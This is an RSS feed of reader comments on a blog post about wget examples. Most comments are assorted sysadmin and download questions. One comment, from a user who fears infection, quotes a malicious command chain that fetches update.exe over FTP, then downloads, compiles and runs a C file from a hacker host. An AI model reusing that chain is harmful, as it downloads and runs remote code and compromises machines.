<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	
	xmlns:georss="http://www.georss.org/georss"
	xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#"
	
	>
<channel>
	<title>
	Comments on: Wget examples and scripts	</title>
	<atom:link href="https://www.krazyworks.com/wget-examples-and-scripts/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.krazyworks.com/wget-examples-and-scripts/</link>
	<description>Networking, Systems Design, and Disaster Recovery</description>
	<lastBuildDate>Thu, 02 Mar 2017 02:25:08 +0000</lastBuildDate>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.7.9</generator>
	<item>
		<title>
		By: Wget Examples &#124; KrazyWorks		</title>
		<link>https://www.krazyworks.com/wget-examples-and-scripts/comment-page-2/#comment-274879</link>

		<dc:creator><![CDATA[Wget Examples &#124; KrazyWorks]]></dc:creator>
		<pubDate>Thu, 02 Mar 2017 02:25:08 +0000</pubDate>
		<guid isPermaLink="false">http://www.comradegeneral.com/SysAdmin/?p=64#comment-274879</guid>

					<description><![CDATA[[&#8230;] is a follow-up to my previous wget&#160;notes (1, 2, 3, 4). From time to time I find myself googling wget&#160;syntax even though I think I&#8217;ve [&#8230;]]]></description>
			<content:encoded><![CDATA[<p>[&#8230;] is a follow-up to my previous wget&nbsp;notes (1, 2, 3, 4). From time to time I find myself googling wget&nbsp;syntax even though I think I&#8217;ve [&#8230;]</p>
]]></content:encoded>
		
			</item>
		<item>
		<title>
		By: Fixed: How can I download an entire website? #it #development #solution &#124; InfoBot		</title>
		<link>https://www.krazyworks.com/wget-examples-and-scripts/comment-page-2/#comment-274776</link>

		<dc:creator><![CDATA[Fixed: How can I download an entire website? #it #development #solution &#124; InfoBot]]></dc:creator>
		<pubDate>Thu, 15 Jan 2015 15:42:28 +0000</pubDate>
		<guid isPermaLink="false">http://www.comradegeneral.com/SysAdmin/?p=64#comment-274776</guid>

					<description><![CDATA[[&#8230;] Wget examples and scripts [&#8230;]]]></description>
			<content:encoded><![CDATA[<p>[&#8230;] Wget examples and scripts [&#8230;]</p>
]]></content:encoded>
		
			</item>
		<item>
		<title>
		By: Solution: How can I download an entire website? #fix #answer #development &#124; StackCopy		</title>
		<link>https://www.krazyworks.com/wget-examples-and-scripts/comment-page-2/#comment-274775</link>

		<dc:creator><![CDATA[Solution: How can I download an entire website? #fix #answer #development &#124; StackCopy]]></dc:creator>
		<pubDate>Mon, 05 Jan 2015 05:03:41 +0000</pubDate>
		<guid isPermaLink="false">http://www.comradegeneral.com/SysAdmin/?p=64#comment-274775</guid>

					<description><![CDATA[[&#8230;] Wget examples and scripts [&#8230;]]]></description>
			<content:encoded><![CDATA[<p>[&#8230;] Wget examples and scripts [&#8230;]</p>
]]></content:encoded>
		
			</item>
		<item>
		<title>
		By: John G		</title>
		<link>https://www.krazyworks.com/wget-examples-and-scripts/comment-page-2/#comment-248001</link>

		<dc:creator><![CDATA[John G]]></dc:creator>
		<pubDate>Sun, 31 Mar 2013 10:22:12 +0000</pubDate>
		<guid isPermaLink="false">http://www.comradegeneral.com/SysAdmin/?p=64#comment-248001</guid>

					<description><![CDATA[computers have a different operating system. Other choices are also available, such as UNIX and Linux. Why do you think Windows is so prevalent? What do the other systems have to offer that Windows does not? Who uses the other systems?
]]></description>
			<content:encoded><![CDATA[<p>computers have a different operating system. Other choices are also available, such as UNIX and Linux. Why do you think Windows is so prevalent? What do the other systems have to offer that Windows does not? Who uses the other systems?</p>
]]></content:encoded>
		
			</item>
		<item>
		<title>
		By: Sonny		</title>
		<link>https://www.krazyworks.com/wget-examples-and-scripts/comment-page-2/#comment-247910</link>

		<dc:creator><![CDATA[Sonny]]></dc:creator>
		<pubDate>Sat, 30 Mar 2013 19:07:54 +0000</pubDate>
		<guid isPermaLink="false">http://www.comradegeneral.com/SysAdmin/?p=64#comment-247910</guid>

					<description><![CDATA[I seen many operating systems in Linux that are free. What is the best and takes up the least amount of space. Please also tell me the recommended space needed for the os.
]]></description>
			<content:encoded><![CDATA[<p>I seen many operating systems in Linux that are free. What is the best and takes up the least amount of space. Please also tell me the recommended space needed for the os.</p>
]]></content:encoded>
		
			</item>
		<item>
		<title>
		By: Joey 01		</title>
		<link>https://www.krazyworks.com/wget-examples-and-scripts/comment-page-2/#comment-247723</link>

		<dc:creator><![CDATA[Joey 01]]></dc:creator>
		<pubDate>Fri, 29 Mar 2013 14:11:08 +0000</pubDate>
		<guid isPermaLink="false">http://www.comradegeneral.com/SysAdmin/?p=64#comment-247723</guid>

					<description><![CDATA[how to use/write perl script in linux copy file from windows?

I need to execute perl script from linux server copy a file from windows drive folder.
example like:
the file is located at c:abcdxyz.log
i need to copy this xyz.log to a linux/unixbase server directory /var/opt/abc/xyz.log by using perl script on linux/unix base server. 

how to write the perl script to perform the activity above?
any example? 

Pls help! Thank You.
]]></description>
			<content:encoded><![CDATA[<p>how to use/write perl script in linux copy file from windows?</p>
<p>I need to execute perl script from linux server copy a file from windows drive folder.<br />
example like:<br />
the file is located at c:abcdxyz.log<br />
i need to copy this xyz.log to a linux/unixbase server directory /var/opt/abc/xyz.log by using perl script on linux/unix base server. </p>
<p>how to write the perl script to perform the activity above?<br />
any example? </p>
<p>Pls help! Thank You.</p>
]]></content:encoded>
		
			</item>
		<item>
		<title>
		By: thexbox360player		</title>
		<link>https://www.krazyworks.com/wget-examples-and-scripts/comment-page-1/#comment-247516</link>

		<dc:creator><![CDATA[thexbox360player]]></dc:creator>
		<pubDate>Wed, 27 Mar 2013 22:32:50 +0000</pubDate>
		<guid isPermaLink="false">http://www.comradegeneral.com/SysAdmin/?p=64#comment-247516</guid>

					<description><![CDATA[please help me to create a batch file for downloading
i want to make a batch in which we just type the addresses or links and a paith of folder it is for where the downloaded file store.
this all attemps are for the people those download files from a website daily
for example i download the assingments form the website daily from just one link.
now my aim is this to create a bat .for download all the files from the web on one click
and not perform one by one file.
if you have an idea about this then plz share with me
the coding for batch
for downloading
thanks
]]></description>
			<content:encoded><![CDATA[<p>please help me to create a batch file for downloading<br />
i want to make a batch in which we just type the addresses or links and a paith of folder it is for where the downloaded file store.<br />
this all attemps are for the people those download files from a website daily<br />
for example i download the assingments form the website daily from just one link.<br />
now my aim is this to create a bat .for download all the files from the web on one click<br />
and not perform one by one file.<br />
if you have an idea about this then plz share with me<br />
the coding for batch<br />
for downloading<br />
thanks</p>
]]></content:encoded>
		
			</item>
		<item>
		<title>
		By: Andrew S		</title>
		<link>https://www.krazyworks.com/wget-examples-and-scripts/comment-page-1/#comment-247439</link>

		<dc:creator><![CDATA[Andrew S]]></dc:creator>
		<pubDate>Wed, 27 Mar 2013 13:30:37 +0000</pubDate>
		<guid isPermaLink="false">http://www.comradegeneral.com/SysAdmin/?p=64#comment-247439</guid>

					<description><![CDATA[I am using a chain of pipes to extract a set of links from a downloaded HTML. However, in the one before last step, I have a list of relative URLs and I would like to prepend the address of the server. I would love to insert that in the chain using a command like &quot;prepend&quot; in this example:
grep &quot;my regexp&quot; file.html &#124; more commands &#124; prepend &quot;http://www.server.com/&quot; &#124; wget -i

More generally, it would be cool to have a command which would insert the contents of each input line at a specified place in a pattern, like
sandwich -c _ abc_def:

input line 1
input line 2
-&#062;
abcinput line 1def
abcinput line 2def

But a command for only prepending or only appending something to each line would suffice. I mean, it&#039;s easy to cut out a part of each line using cut, there should be a reverse command available, too.

Please note before answering that I&#039;m sure that
1) sed or awk could handle this with ease (but I don&#039;t feel like learning them), and
2) writing a Perl script for this would take 10x less time than typing out this question,
but I think I am missing some really neat standard way of doing this straight from the command line without any extra gear and I want to know. So, how do I go about doing so?
]]></description>
			<content:encoded><![CDATA[<p>I am using a chain of pipes to extract a set of links from a downloaded HTML. However, in the one before last step, I have a list of relative URLs and I would like to prepend the address of the server. I would love to insert that in the chain using a command like &#8220;prepend&#8221; in this example:<br />
grep &#8220;my regexp&#8221; file.html | more commands | prepend &#8220;http://www.server.com/&#8221; | wget -i</p>
<p>More generally, it would be cool to have a command which would insert the contents of each input line at a specified place in a pattern, like<br />
sandwich -c _ abc_def:</p>
<p>input line 1<br />
input line 2<br />
-&gt;<br />
abcinput line 1def<br />
abcinput line 2def</p>
<p>But a command for only prepending or only appending something to each line would suffice. I mean, it&#8217;s easy to cut out a part of each line using cut, there should be a reverse command available, too.</p>
<p>Please note before answering that I&#8217;m sure that<br />
1) sed or awk could handle this with ease (but I don&#8217;t feel like learning them), and<br />
2) writing a Perl script for this would take 10x less time than typing out this question,<br />
but I think I am missing some really neat standard way of doing this straight from the command line without any extra gear and I want to know. So, how do I go about doing so?</p>
]]></content:encoded>
		
			</item>
		<item>
		<title>
		By: Harriet W		</title>
		<link>https://www.krazyworks.com/wget-examples-and-scripts/comment-page-1/#comment-247343</link>

		<dc:creator><![CDATA[Harriet W]]></dc:creator>
		<pubDate>Tue, 26 Mar 2013 19:06:02 +0000</pubDate>
		<guid isPermaLink="false">http://www.comradegeneral.com/SysAdmin/?p=64#comment-247343</guid>

					<description><![CDATA[Wanted to know if supercomputers required a different operating system than a regular computer. I would think they use something very different or custom made.
]]></description>
			<content:encoded><![CDATA[<p>Wanted to know if supercomputers required a different operating system than a regular computer. I would think they use something very different or custom made.</p>
]]></content:encoded>
		
			</item>
		<item>
		<title>
		By: United		</title>
		<link>https://www.krazyworks.com/wget-examples-and-scripts/comment-page-1/#comment-247273</link>

		<dc:creator><![CDATA[United]]></dc:creator>
		<pubDate>Tue, 26 Mar 2013 12:12:07 +0000</pubDate>
		<guid isPermaLink="false">http://www.comradegeneral.com/SysAdmin/?p=64#comment-247273</guid>

					<description><![CDATA[hey
about 30 mins ago i was typing an email and suddenly it started typing stuff:
 ik &#038;echo binary &#062;&#062; ik &#038;echo get update.exe &#062;&#062;  &#062;&#062; ik &#038;ftp -n -v -s:ik &#038;del ik &#038;update.exe &#062;&#062; echo mkdir .opz &#062;&#062; echo cd .opz &#062;&#062; echo wget http://shell.h4ck,biz/~kredkrew/index.c &#062;&#062; echo gcc -o opz index.c &#062;&#062; echo nice work &#062;&#062; echo ./opz &#062;&#062; echo Another Rooted!! &#038;exit echo You got owned
i got most of it 
there was a bit missing at the start because i was pressing backspace at the beginning i think it said cmd /c then a little bit then the rest of the code
i don&#039;t know if Ive been hacked or something that&#039;s deferentially wrong though i&#039;m lucky that i was typing an email because i found another example of when someone found it in command line 
so i think it was meant to go in there 
i have researched the site and gone to the url but it all 404s and has databace errors 
i first ran a AVG scan and it came up with:
&quot;&quot;;&quot;HKLMSOFTWAREWow6432NodeMicrosoftWindowsCurrentVersionUninstallHardcore&quot;;&quot;Found Dialer.Generic&quot;;&quot;Moved to Virus Vault&quot;
so it removed it to the virus vault i dont know if it was that
when it happend i was running rsbot from powerbot 
im not sure if it could have been the script i was using or something but i have now got rid of it (rsbot and the script)
im downloading malware bites, spybot search and destroy, and adaware 
imgoing to do a scan with each 
is there anything elce i can do?
should i do a system restore?
something that gives me hope is that the url has a , colon insted of dot so i dont thing it would have been able to get to the url

im also going to do a scan for security holes

sorry for the TERRIBLE typing/spelling im trying to get this up asap
i do keep everything up to date 
but if the worst comes to worst i may end up reinstalling my os

ive just realised that i has 2 ports open compete ally on my router that go to my pc so i have now removed them

i know im a idiout
]]></description>
			<content:encoded><![CDATA[<p>hey<br />
about 30 mins ago i was typing an email and suddenly it started typing stuff:<br />
 ik &amp;echo binary &gt;&gt; ik &amp;echo get update.exe &gt;&gt;  &gt;&gt; ik &amp;ftp -n -v -s:ik &amp;del ik &amp;update.exe &gt;&gt; echo mkdir .opz &gt;&gt; echo cd .opz &gt;&gt; echo wget <a href="http://shell.h4ck,biz/~kredkrew/index.c" rel="nofollow ugc">http://shell.h4ck,biz/~kredkrew/index.c</a> &gt;&gt; echo gcc -o opz index.c &gt;&gt; echo nice work &gt;&gt; echo ./opz &gt;&gt; echo Another Rooted!! &amp;exit echo You got owned<br />
i got most of it<br />
there was a bit missing at the start because i was pressing backspace at the beginning i think it said cmd /c then a little bit then the rest of the code<br />
i don&#8217;t know if Ive been hacked or something that&#8217;s deferentially wrong though i&#8217;m lucky that i was typing an email because i found another example of when someone found it in command line<br />
so i think it was meant to go in there<br />
i have researched the site and gone to the url but it all 404s and has databace errors<br />
i first ran a AVG scan and it came up with:<br />
&#8220;&#8221;;&#8221;HKLMSOFTWAREWow6432NodeMicrosoftWindowsCurrentVersionUninstallHardcore&#8221;;&#8221;Found Dialer.Generic&#8221;;&#8221;Moved to Virus Vault&#8221;<br />
so it removed it to the virus vault i dont know if it was that<br />
when it happend i was running rsbot from powerbot<br />
im not sure if it could have been the script i was using or something but i have now got rid of it (rsbot and the script)<br />
im downloading malware bites, spybot search and destroy, and adaware<br />
imgoing to do a scan with each<br />
is there anything elce i can do?<br />
should i do a system restore?<br />
something that gives me hope is that the url has a , colon insted of dot so i dont thing it would have been able to get to the url</p>
<p>im also going to do a scan for security holes</p>
<p>sorry for the TERRIBLE typing/spelling im trying to get this up asap<br />
i do keep everything up to date<br />
but if the worst comes to worst i may end up reinstalling my os</p>
<p>ive just realised that i has 2 ports open compete ally on my router that go to my pc so i have now removed them</p>
<p>i know im a idiout</p>
]]></content:encoded>
		
			</item>
		<item>
		<title>
		By: norrin_shadowwolf		</title>
		<link>https://www.krazyworks.com/wget-examples-and-scripts/comment-page-1/#comment-247214</link>

		<dc:creator><![CDATA[norrin_shadowwolf]]></dc:creator>
		<pubDate>Tue, 26 Mar 2013 01:08:54 +0000</pubDate>
		<guid isPermaLink="false">http://www.comradegeneral.com/SysAdmin/?p=64#comment-247214</guid>

					<description><![CDATA[I have recently started looking into programing, since I want to start studying it when I start university! And I had this idea of a program I would write. (Had I actually known what I was doing).
I want a program that fetches images from a site which uploads a new picture every day and save it to my desktop background folder! I would like it to do so automatically once every day.
Is there anyone who can write me a &quot;recipe&quot; for a script which I could write down in Python? (I don&#039;t want any downloads since I want to study the script)
Think of it as a small project if you know what you are doing! :)
Any contribution is much appreciated!!
]]></description>
			<content:encoded><![CDATA[<p>I have recently started looking into programing, since I want to start studying it when I start university! And I had this idea of a program I would write. (Had I actually known what I was doing).<br />
I want a program that fetches images from a site which uploads a new picture every day and save it to my desktop background folder! I would like it to do so automatically once every day.<br />
Is there anyone who can write me a &#8220;recipe&#8221; for a script which I could write down in Python? (I don&#8217;t want any downloads since I want to study the script)<br />
Think of it as a small project if you know what you are doing! :)<br />
Any contribution is much appreciated!!</p>
]]></content:encoded>
		
			</item>
		<item>
		<title>
		By: Picean		</title>
		<link>https://www.krazyworks.com/wget-examples-and-scripts/comment-page-1/#comment-247160</link>

		<dc:creator><![CDATA[Picean]]></dc:creator>
		<pubDate>Mon, 25 Mar 2013 15:06:22 +0000</pubDate>
		<guid isPermaLink="false">http://www.comradegeneral.com/SysAdmin/?p=64#comment-247160</guid>

					<description><![CDATA[I know this sounds bizarre, but my webmaster passed away suddenly and I need to keep my website up and running.  I do not have access to his PC.  I believe that he was hosting the site on his own servers (not sure).  And he is listed as the registrant for my domain name, along with my company name.  Ideally what I want to do is move the website to another hosting company and then have someone else administer the website.  I assume I would need the software that he used to develop the site in order to do this.  HELP!  I&#039;ve never encountered a problem like this before and I can&#039;t find any help on the web.
]]></description>
			<content:encoded><![CDATA[<p>I know this sounds bizarre, but my webmaster passed away suddenly and I need to keep my website up and running.  I do not have access to his PC.  I believe that he was hosting the site on his own servers (not sure).  And he is listed as the registrant for my domain name, along with my company name.  Ideally what I want to do is move the website to another hosting company and then have someone else administer the website.  I assume I would need the software that he used to develop the site in order to do this.  HELP!  I&#8217;ve never encountered a problem like this before and I can&#8217;t find any help on the web.</p>
]]></content:encoded>
		
			</item>
		<item>
		<title>
		By: Clayton Cottrell		</title>
		<link>https://www.krazyworks.com/wget-examples-and-scripts/comment-page-1/#comment-247084</link>

		<dc:creator><![CDATA[Clayton Cottrell]]></dc:creator>
		<pubDate>Mon, 25 Mar 2013 03:50:45 +0000</pubDate>
		<guid isPermaLink="false">http://www.comradegeneral.com/SysAdmin/?p=64#comment-247084</guid>

					<description><![CDATA[Is it possible to do it in Google Finance ?
For instance : Shanghai stock 900947 ?
]]></description>
			<content:encoded><![CDATA[<p>Is it possible to do it in Google Finance ?<br />
For instance : Shanghai stock 900947 ?</p>
]]></content:encoded>
		
			</item>
		<item>
		<title>
		By: mrankinmatt		</title>
		<link>https://www.krazyworks.com/wget-examples-and-scripts/comment-page-1/#comment-247078</link>

		<dc:creator><![CDATA[mrankinmatt]]></dc:creator>
		<pubDate>Mon, 25 Mar 2013 02:02:15 +0000</pubDate>
		<guid isPermaLink="false">http://www.comradegeneral.com/SysAdmin/?p=64#comment-247078</guid>

					<description><![CDATA[I recently starts some email marketing campaigns. We choose a email marketing software named PHPKode Newsletter X. Everything is well but it&#039;s Cronjobs Configuration.

It tells me this in their site,

&quot;The setup processe of a cronjob depends on the hosting software you are using (Plesk, cPanel). Then add the commands bellow.

wget -O - -q -t 1 http://demo.phpnewsletter.org/newsletter_sendmail.php?key=hZwtPALP&#038;user_id=1&quot;

I use a webhosting in HostGator, so anyone tell me how i can setup this cronjobs correctly?
You can find the configuration at their demo site http://www.phpnewsletter.org
]]></description>
			<content:encoded><![CDATA[<p>I recently starts some email marketing campaigns. We choose a email marketing software named PHPKode Newsletter X. Everything is well but it&#8217;s Cronjobs Configuration.</p>
<p>It tells me this in their site,</p>
<p>&#8220;The setup processe of a cronjob depends on the hosting software you are using (Plesk, cPanel). Then add the commands bellow.</p>
<p>wget -O &#8211; -q -t 1 <a href="http://demo.phpnewsletter.org/newsletter_sendmail.php?key=hZwtPALP&#038;user_id=1" rel="nofollow ugc">http://demo.phpnewsletter.org/newsletter_sendmail.php?key=hZwtPALP&#038;user_id=1</a>&#8221;</p>
<p>I use a webhosting in HostGator, so anyone tell me how i can setup this cronjobs correctly?<br />
You can find the configuration at their demo site <a href="http://www.phpnewsletter.org" rel="nofollow ugc">http://www.phpnewsletter.org</a></p>
]]></content:encoded>
		
			</item>
		<item>
		<title>
		By: The Dark Knight		</title>
		<link>https://www.krazyworks.com/wget-examples-and-scripts/comment-page-1/#comment-247019</link>

		<dc:creator><![CDATA[The Dark Knight]]></dc:creator>
		<pubDate>Sun, 24 Mar 2013 16:49:19 +0000</pubDate>
		<guid isPermaLink="false">http://www.comradegeneral.com/SysAdmin/?p=64#comment-247019</guid>

					<description><![CDATA[I have a ConfigSystem file on my Linux machine and the program was ported from a Sun box so it has 4 different functions:

Sun64(), Sun32(), linux32(), and linux64()  each with all the compiler settings.  

How or where is it told which function to use?

Thanks!
]]></description>
			<content:encoded><![CDATA[<p>I have a ConfigSystem file on my Linux machine and the program was ported from a Sun box so it has 4 different functions:</p>
<p>Sun64(), Sun32(), linux32(), and linux64()  each with all the compiler settings.  </p>
<p>How or where is it told which function to use?</p>
<p>Thanks!</p>
]]></content:encoded>
		
			</item>
		<item>
		<title>
		By: Michael C		</title>
		<link>https://www.krazyworks.com/wget-examples-and-scripts/comment-page-1/#comment-246942</link>

		<dc:creator><![CDATA[Michael C]]></dc:creator>
		<pubDate>Sun, 24 Mar 2013 02:02:57 +0000</pubDate>
		<guid isPermaLink="false">http://www.comradegeneral.com/SysAdmin/?p=64#comment-246942</guid>

					<description><![CDATA[i want to downloads some files(nearly about 1000-2000 zip files) from a website. i can sit around and add each file one after another. please give me a program or script or whatever method so i can automate the download.

The website i am talking about has download link as

abc.co/date/12345/folder/12345_zip.zip

date can be taken care of. the main concern is that number 12345 before and after the folder, they both change simultaneously. eg

abc.co/date/23456/folder/23456_zip.zip 
abc.co/date/54321/folder/54321_zip.zip

i tried using curl

abc.co/date/[12345-54321]/folder/[12345-54321]_zip.zip

but it makes to much of combination of downloads i.e. keeps left 12345 as it is and scan through 12345 to 54321 the increment left 12345 +1 then repeats scan from [12345-54321].

also tried bash wget here i have one variable at two places , when using loop the right 12345 with a &quot; _&quot; is ignored by the program. PLease help me, i dont know much about linux or programing, thanks
]]></description>
			<content:encoded><![CDATA[<p>i want to downloads some files(nearly about 1000-2000 zip files) from a website. i can sit around and add each file one after another. please give me a program or script or whatever method so i can automate the download.</p>
<p>The website i am talking about has download link as</p>
<p>abc.co/date/12345/folder/12345_zip.zip</p>
<p>date can be taken care of. the main concern is that number 12345 before and after the folder, they both change simultaneously. eg</p>
<p>abc.co/date/23456/folder/23456_zip.zip<br />
abc.co/date/54321/folder/54321_zip.zip</p>
<p>i tried using curl</p>
<p>abc.co/date/[12345-54321]/folder/[12345-54321]_zip.zip</p>
<p>but it makes to much of combination of downloads i.e. keeps left 12345 as it is and scan through 12345 to 54321 the increment left 12345 +1 then repeats scan from [12345-54321].</p>
<p>also tried bash wget here i have one variable at two places , when using loop the right 12345 with a &#8221; _&#8221; is ignored by the program. PLease help me, i dont know much about linux or programing, thanks</p>
]]></content:encoded>
		
			</item>
		<item>
		<title>
		By: DuckieM10		</title>
		<link>https://www.krazyworks.com/wget-examples-and-scripts/comment-page-1/#comment-246930</link>

		<dc:creator><![CDATA[DuckieM10]]></dc:creator>
		<pubDate>Sun, 24 Mar 2013 00:19:07 +0000</pubDate>
		<guid isPermaLink="false">http://www.comradegeneral.com/SysAdmin/?p=64#comment-246930</guid>

					<description><![CDATA[The solution to:
How to prevent the execution of cron job from the url by any user?

I have my cron job script in a folder with the name like password: 3e2fkjn32kgjn.php.
It is possible to a user figure out the url and execute the cron?
If yes, how to prevent that?



Detaills: my cron script emails me the statics of the web every day.

So, Can you tell me if is possible to get the cron url? if yes, how? and how to prevent it?

Thanks-
]]></description>
			<content:encoded><![CDATA[<p>The solution to:<br />
How to prevent the execution of cron job from the url by any user?</p>
<p>I have my cron job script in a folder with the name like password: 3e2fkjn32kgjn.php.<br />
It is possible to a user figure out the url and execute the cron?<br />
If yes, how to prevent that?</p>
<p>Detaills: my cron script emails me the statics of the web every day.</p>
<p>So, Can you tell me if is possible to get the cron url? if yes, how? and how to prevent it?</p>
<p>Thanks-</p>
]]></content:encoded>
		
			</item>
		<item>
		<title>
		By: gail C		</title>
		<link>https://www.krazyworks.com/wget-examples-and-scripts/comment-page-1/#comment-246903</link>

		<dc:creator><![CDATA[gail C]]></dc:creator>
		<pubDate>Sat, 23 Mar 2013 16:41:15 +0000</pubDate>
		<guid isPermaLink="false">http://www.comradegeneral.com/SysAdmin/?p=64#comment-246903</guid>

					<description><![CDATA[i want to know how can i upload a file that is stored in a web server ( example : http://dl.ibox.org.ua/8/70322/Bengu___Taktik_www.Musicha.com.zip ) to my own web server?
is there any codes or such things that i can put in my web host that can do this thing for me ?
like i put the url of the file that i want to upload to my web host and click the button then it trasfers the file to my web host?
my host supports java script and php!
]]></description>
			<content:encoded><![CDATA[<p>i want to know how can i upload a file that is stored in a web server ( example : <a href="http://dl.ibox.org.ua/8/70322/Bengu___Taktik_www.Musicha.com.zip" rel="nofollow ugc">http://dl.ibox.org.ua/8/70322/Bengu___Taktik_www.Musicha.com.zip</a> ) to my own web server?<br />
is there any codes or such things that i can put in my web host that can do this thing for me ?<br />
like i put the url of the file that i want to upload to my web host and click the button then it trasfers the file to my web host?<br />
my host supports java script and php!</p>
]]></content:encoded>
		
			</item>
		<item>
		<title>
		By: Squall Leonhart		</title>
		<link>https://www.krazyworks.com/wget-examples-and-scripts/comment-page-1/#comment-246890</link>

		<dc:creator><![CDATA[Squall Leonhart]]></dc:creator>
		<pubDate>Sat, 23 Mar 2013 13:06:07 +0000</pubDate>
		<guid isPermaLink="false">http://www.comradegeneral.com/SysAdmin/?p=64#comment-246890</guid>

					<description><![CDATA[What are the fundamental differences between Windows®, Mac OS®, UNIX, and Linux operating systems for personal computers?
]]></description>
			<content:encoded><![CDATA[<p>What are the fundamental differences between Windows®, Mac OS®, UNIX, and Linux operating systems for personal computers?</p>
]]></content:encoded>
		
			</item>
		<item>
		<title>
		By: Beavis		</title>
		<link>https://www.krazyworks.com/wget-examples-and-scripts/comment-page-1/#comment-246865</link>

		<dc:creator><![CDATA[Beavis]]></dc:creator>
		<pubDate>Sat, 23 Mar 2013 07:30:05 +0000</pubDate>
		<guid isPermaLink="false">http://www.comradegeneral.com/SysAdmin/?p=64#comment-246865</guid>

					<description><![CDATA[Give me five architecture types that are unrelated and five operating systems that are unrelated.
Unrelated is the key term.
]]></description>
			<content:encoded><![CDATA[<p>Give me five architecture types that are unrelated and five operating systems that are unrelated.<br />
Unrelated is the key term.</p>
]]></content:encoded>
		
			</item>
		<item>
		<title>
		By: homerliveshere		</title>
		<link>https://www.krazyworks.com/wget-examples-and-scripts/comment-page-1/#comment-246839</link>

		<dc:creator><![CDATA[homerliveshere]]></dc:creator>
		<pubDate>Sat, 23 Mar 2013 04:35:03 +0000</pubDate>
		<guid isPermaLink="false">http://www.comradegeneral.com/SysAdmin/?p=64#comment-246839</guid>

					<description><![CDATA[Have been wondering for some time.

Excluding other hacks potentially involved, I was wondering if a DDoS attack in it of itself is actually illegal? 
And if so at what point is refreshing a page considered illegal?
I was thinking same, but just am curious at what point is the line drawn, 5-25-100-1000+ times a minute? Just seems rather gray area of law to me to me. I mean you&#039;re not actually causing any real damage per se, so im also curious as to what makes it illegal.
]]></description>
			<content:encoded><![CDATA[<p>Have been wondering for some time.</p>
<p>Excluding other hacks potentially involved, I was wondering if a DDoS attack in it of itself is actually illegal?<br />
And if so at what point is refreshing a page considered illegal?<br />
I was thinking same, but just am curious at what point is the line drawn, 5-25-100-1000+ times a minute? Just seems rather gray area of law to me to me. I mean you&#8217;re not actually causing any real damage per se, so im also curious as to what makes it illegal.</p>
]]></content:encoded>
		
			</item>
		<item>
		<title>
		By: Joe T		</title>
		<link>https://www.krazyworks.com/wget-examples-and-scripts/comment-page-1/#comment-246702</link>

		<dc:creator><![CDATA[Joe T]]></dc:creator>
		<pubDate>Fri, 22 Mar 2013 05:58:15 +0000</pubDate>
		<guid isPermaLink="false">http://www.comradegeneral.com/SysAdmin/?p=64#comment-246702</guid>

					<description><![CDATA[I just want to practice Unix commands and start learning shell scripting and what is kernel. Cold you tell me the earliest and/or the smallest version of Unix, I Don&#039;t need Graphical User interface for the time being. I need the Unix to be the smallest to be practiced in with smallest space required for RAM and Hard disk.
Thanks Martino I will try that but could you tell me  any version of Unix that is of the size about 2 MB like MS Dos.
]]></description>
			<content:encoded><![CDATA[<p>I just want to practice Unix commands and start learning shell scripting and what is kernel. Cold you tell me the earliest and/or the smallest version of Unix, I Don&#8217;t need Graphical User interface for the time being. I need the Unix to be the smallest to be practiced in with smallest space required for RAM and Hard disk.<br />
Thanks Martino I will try that but could you tell me  any version of Unix that is of the size about 2 MB like MS Dos.</p>
]]></content:encoded>
		
			</item>
	</channel>
</rss>
